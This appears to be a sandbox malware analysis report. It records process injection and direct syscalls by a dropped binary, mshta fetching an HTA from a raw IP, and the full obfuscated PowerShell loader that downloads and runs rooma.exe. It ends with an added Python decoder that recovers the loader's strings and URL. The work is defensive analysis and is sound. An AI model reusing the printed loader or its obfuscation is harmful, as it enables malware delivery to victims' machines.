Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h] 7_2_015992C5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015992C5 mov eax, dword ptr fs:[00000030h] 7_2_015992C5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F2F8 mov eax, dword ptr fs:[00000030h] 7_2_0164F2F8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015892FF mov eax, dword ptr fs:[00000030h] 7_2_015892FF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02E1 mov eax, dword ptr fs:[00000030h] 7_2_015A02E1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C329E mov eax, dword ptr fs:[00000030h] 7_2_015C329E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016272A0 mov eax, dword ptr fs:[00000030h] 7_2_016272A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov eax, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016262A0 mov ecx, dword ptr fs:[00000030h] 7_2_016262A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016592A6 mov eax, dword ptr fs:[00000030h] 7_2_016592A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE284 mov eax, dword ptr fs:[00000030h] 7_2_015CE284
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov eax, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016192BC mov ecx, dword ptr fs:[00000030h] 7_2_016192BC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01610283 mov eax, dword ptr fs:[00000030h] 7_2_01610283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665283 mov eax, dword ptr fs:[00000030h] 7_2_01665283
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A02A0 mov eax, dword ptr fs:[00000030h] 7_2_015A02A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 mov eax, dword ptr fs:[00000030h] 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01598550 mov eax, dword ptr fs:[00000030h] 7_2_01598550
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CB570 mov eax, dword ptr fs:[00000030h] 7_2_015CB570
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C656A mov eax, dword ptr fs:[00000030h] 7_2_015C656A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B562 mov eax, dword ptr fs:[00000030h] 7_2_0158B562
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163F525 mov eax, dword ptr fs:[00000030h] 7_2_0163F525
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B52F mov eax, dword ptr fs:[00000030h] 7_2_0164B52F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665537 mov eax, dword ptr fs:[00000030h] 7_2_01665537
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7505 mov eax, dword ptr fs:[00000030h] 7_2_015C7505
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7505 mov ecx, dword ptr fs:[00000030h] 7_2_015C7505
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE53E mov eax, dword ptr fs:[00000030h] 7_2_015BE53E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01664500 mov eax, dword ptr fs:[00000030h] 7_2_01664500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD530 mov eax, dword ptr fs:[00000030h] 7_2_015CD530
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159D534 mov eax, dword ptr fs:[00000030h] 7_2_0159D534
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 mov eax, dword ptr fs:[00000030h] 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B95DA mov eax, dword ptr fs:[00000030h] 7_2_015B95DA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015965D0 mov eax, dword ptr fs:[00000030h] 7_2_015965D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA5D0 mov eax, dword ptr fs:[00000030h] 7_2_015CA5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE5CF mov eax, dword ptr fs:[00000030h] 7_2_015CE5CF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C55C0 mov eax, dword ptr fs:[00000030h] 7_2_015C55C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15F4 mov eax, dword ptr fs:[00000030h] 7_2_015B15F4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016655C9 mov eax, dword ptr fs:[00000030h] 7_2_016655C9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D5D0 mov eax, dword ptr fs:[00000030h] 7_2_0160D5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D5D0 mov ecx, dword ptr fs:[00000030h] 7_2_0160D5D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016635D7 mov eax, dword ptr fs:[00000030h] 7_2_016635D7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CC5ED mov eax, dword ptr fs:[00000030h] 7_2_015CC5ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015925E0 mov eax, dword ptr fs:[00000030h] 7_2_015925E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BE5E7 mov eax, dword ptr fs:[00000030h] 7_2_015BE5E7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE59C mov eax, dword ptr fs:[00000030h] 7_2_015CE59C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016105A7 mov eax, dword ptr fs:[00000030h] 7_2_016105A7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C4588 mov eax, dword ptr fs:[00000030h] 7_2_015C4588
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158758F mov eax, dword ptr fs:[00000030h] 7_2_0158758F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016235BA mov eax, dword ptr fs:[00000030h] 7_2_016235BA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F5BE mov eax, dword ptr fs:[00000030h] 7_2_0164F5BE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592582 mov eax, dword ptr fs:[00000030h] 7_2_01592582
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592582 mov ecx, dword ptr fs:[00000030h] 7_2_01592582
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B45B1 mov eax, dword ptr fs:[00000030h] 7_2_015B45B1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF5B0 mov eax, dword ptr fs:[00000030h] 7_2_015BF5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B15A9 mov eax, dword ptr fs:[00000030h] 7_2_015B15A9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161B594 mov eax, dword ptr fs:[00000030h] 7_2_0161B594
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B245A mov eax, dword ptr fs:[00000030h] 7_2_015B245A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158645D mov eax, dword ptr fs:[00000030h] 7_2_0158645D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159B440 mov eax, dword ptr fs:[00000030h] 7_2_0159B440
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166547F mov eax, dword ptr fs:[00000030h] 7_2_0166547F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE443 mov eax, dword ptr fs:[00000030h] 7_2_015CE443
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BA470 mov eax, dword ptr fs:[00000030h] 7_2_015BA470
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F453 mov eax, dword ptr fs:[00000030h] 7_2_0164F453
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 mov eax, dword ptr fs:[00000030h] 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AF460 mov eax, dword ptr fs:[00000030h] 7_2_015AF460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B340D mov eax, dword ptr fs:[00000030h] 7_2_015B340D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C8402 mov eax, dword ptr fs:[00000030h] 7_2_015C8402
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA430 mov eax, dword ptr fs:[00000030h] 7_2_015CA430
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E420 mov eax, dword ptr fs:[00000030h] 7_2_0158E420
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C427 mov eax, dword ptr fs:[00000030h] 7_2_0158C427
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016394E0 mov eax, dword ptr fs:[00000030h] 7_2_016394E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015904E5 mov ecx, dword ptr fs:[00000030h] 7_2_015904E5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016654DB mov eax, dword ptr fs:[00000030h] 7_2_016654DB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161A4B0 mov eax, dword ptr fs:[00000030h] 7_2_0161A4B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B480 mov eax, dword ptr fs:[00000030h] 7_2_0158B480
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01599486 mov eax, dword ptr fs:[00000030h] 7_2_01599486
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C34B0 mov eax, dword ptr fs:[00000030h] 7_2_015C34B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtResumeThread: Direct from: 0x77462FBC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtReadFile: Direct from: 0x77462ADC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenKeyEx: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateUserProcess: Direct from: 0x7746371C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtWriteVirtualMemory: Direct from: 0x7746490C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtReadVirtualMemory: Direct from: 0x77462E8C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtTerminateThread: Direct from: 0x77462FCC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtQueryValueKey: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe NtOpenKeyEx: Direct from: 0x77462B9C
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\rooma.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 8128
Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe"
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lqhlh($iaxounjq, $bjgcheb){[io.file]::writeallbytes($iaxounjq, $bjgcheb)};function zkkoodnkdoxlr($iaxounjq){if($iaxounjq.endswith((kgqievzjx @(47125,47179,47187,47187))) -eq $true){rundll32.exe $iaxounjq }elseif($iaxounjq.endswith((kgqievzjx @(47125,47191,47194,47128))) -eq $true){powershell.exe -executionpolicy unrestricted -file $iaxounjq}elseif($iaxounjq.endswith((kgqievzjx @(47125,47188,47194,47184))) -eq $true){misexec /qn /i $iaxounjq}else{start-process $iaxounjq}};function fbuysivjpuzdjbgt($weuptawbrgutyylesbej){$tpkepuydmoafjohrfuef = new-object (kgqievzjx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$bjgcheb = $tpkepuydmoafjohrfuef.downloaddata($weuptawbrgutyylesbej);return $bjgcheb};function kgqievzjx($ethmockqiu){$kiwxaguqzybt=47079;$pdfpjjruzxwzezix=$null;foreach($qnjiurds in $ethmockqiu){$pdfpjjruzxwzezix+=[char]($qnjiurds-$kiwxaguqzybt)};return $pdfpjjruzxwzezix};function imobwpugekddhys(){$bznvnmxsa = $env:appdata + '\';$flaod = $bznvnmxsa + 'rooma.exe'; if (test-path -path $flaod){zkkoodnkdoxlr $flaod;}else{ $movknubo = fbuysivjpuzdjbgt (kgqievzjx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));lqhlh $flaod $movknubo;zkkoodnkdoxlr $flaod;};;;;}imobwpugekddhys;
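The powershell.exe command line that mshta.exe spawns above hides every string it needs (the extension checks, the `Net.WebClient` type name and the payload URL) as an integer array, and a small helper rebuilds each string by subtracting a fixed key (`$kIWXaGUQZYbt=47079`) from every element and casting to `[char]`. The decoder below is an added example written for this page; it is not part of the sandbox report or of the sample. It embeds an excerpt of the recorded command line (trimmed to the fragments that carry encoded arrays), recovers the key from the `[char]($n-$key)` expression instead of hardcoding 47079, decodes every `@( ... )` array in order of appearance, and reconstructs the extension-to-launcher dispatch table. Because it reads the key and function names from the script rather than assuming them, it also applies to variants of this loader that change those values (that generalisation is an assumption about future variants, not something the report states), and it works on the lower-cased copy of the command line that the Sigma matches log.

```python
import re

# Excerpt of the powershell.exe command line recorded in this report (mshta.exe
# parent). Only the fragments containing encoded arrays are kept; the file-write
# helper, the TLS setting and the Test-Path branch are left out of the excerpt.
OBFUSCATED_PS = (
    "function zkkoODnkdOXlr($iAXOUnjQ){"
    "if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }"
    "elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True)"
    "{powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}"
    "elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}"
    "else{Start-Process $iAXOUnjQ}};"
    "function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object "
    "(KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));"
    "$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};"
    "function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;"
    "foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};"
    "return $PDFpjjruzXwZezIX};"
    "function iMoBwPUgEkDDhYs(){$movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,"
    "47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,"
    "47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,"
    "47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod};"
)


def find_offset(script: str) -> int:
    """Recover the subtraction key without assuming its name or value.

    The decoder function is the one whose body evaluates [char]($n-$key);
    the key's name is read from that expression and its integer assignment
    is then looked up. IGNORECASE makes this work on lower-cased log copies.
    """
    m = re.search(r"\[char\]\(\$\w+-\$(\w+)\)", script, re.IGNORECASE)
    if not m:
        raise ValueError("no [char]($n-$key) decoder expression found")
    key = m.group(1)
    v = re.search(r"\$" + re.escape(key) + r"=(\d+)", script, re.IGNORECASE)
    if not v:
        raise ValueError(f"key ${key} is never assigned an integer literal")
    return int(v.group(1))


def decode_array(nums, offset: int) -> str:
    """Apply the loader's own transform: chr(n - key) for each element."""
    return "".join(chr(n - offset) for n in nums)


def _parse_array(text: str) -> list[int]:
    return [int(n) for n in re.split(r"[,\s]+", text.strip()) if n]


def decode_all(script: str) -> list[str]:
    """Decode every @( ... ) integer array, in order of appearance."""
    offset = find_offset(script)
    return [decode_array(_parse_array(a), offset)
            for a in re.findall(r"@\(([\d,\s]+)\)", script)]


def dispatch_table(script: str) -> dict[str, str]:
    """Map each decoded extension check to the launcher command it selects."""
    offset = find_offset(script)
    branch = re.compile(
        r"EndsWith\(\(\w+ @\(([\d,\s]+)\)\)\) -eq \$True\)\{([^}]*)\}", re.IGNORECASE)
    return {decode_array(_parse_array(nums), offset): body.strip()
            for nums, body in branch.findall(script)}


def extract_urls(script: str) -> list[str]:
    """Decoded strings that are download URLs (the stage-2 payload location)."""
    return [s for s in decode_all(script) if re.match(r"https?://", s, re.IGNORECASE)]


if __name__ == "__main__":
    print("key:", find_offset(OBFUSCATED_PS))
    for s in decode_all(OBFUSCATED_PS):
        print("decoded:", s)
    for ext, cmd in dispatch_table(OBFUSCATED_PS).items():
        print(f"{ext:>5} -> {cmd}")
```

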